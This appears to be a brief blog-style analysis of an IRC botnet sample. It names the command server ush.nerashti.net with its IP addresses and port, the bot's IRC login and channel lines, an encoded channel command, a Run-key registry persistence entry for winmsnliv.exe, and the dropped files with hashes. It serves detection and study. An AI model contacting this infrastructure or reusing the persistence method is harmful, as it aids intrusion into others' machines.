ush.nerashti.net(Burimi big hecker)

ush.nerashti.net ip: 109.123.108.61
ush.nerashti.net ip: 88.208.209.166
ush.nerashti.net ip: 174.127.127.137

Remote Host Port Number
109.123.108.61 81

NICK n[USA|XP|COMPUTERNAME]pgsnyzk
USER n “” “lol” :n
JOIN #zib#
PONG 422
PONG :hub.not.found

Now talking in #zib#
Topic On: [ #zib# ] [ msn is dead … :(( ]
Topic By: [ abc ]

(rdp) .s /99/106/112/81/55/59/40/108/121/110/104/104/111/115/124/45/101/124/105/113/108/121/110/82/87/54/124/117/103/56/105/98/111/119/110/18/49/50/57/15/43/49/46/54/58/116/45/98/102/111/62/105/76/86/

Registry Modifications

* The newly created Registry Value is:
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ WindowsDriverControl = “%AppData%C-76947-8457-2745winmsnliv.exe”

so that winmsnliv.exe runs every time Windows starts

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash Alias
1 %AppData%C-76947-8457-2745winmsnliv.exe
[file and pathname of the sample #1] 147 456 bytes MD5: 0x51C169EE9613134FF19F469EA62497A4
SHA-1: 0x1A8F40BBC83AD8D1F66295A20A7195904C34338C Virus.Win32.VBInject [Ikarus]
2 %System%notepads.txt 0 bytes MD5: 0xD41D8CD98F00B204E9800998ECF8427E
SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709

Categories: Uncategorized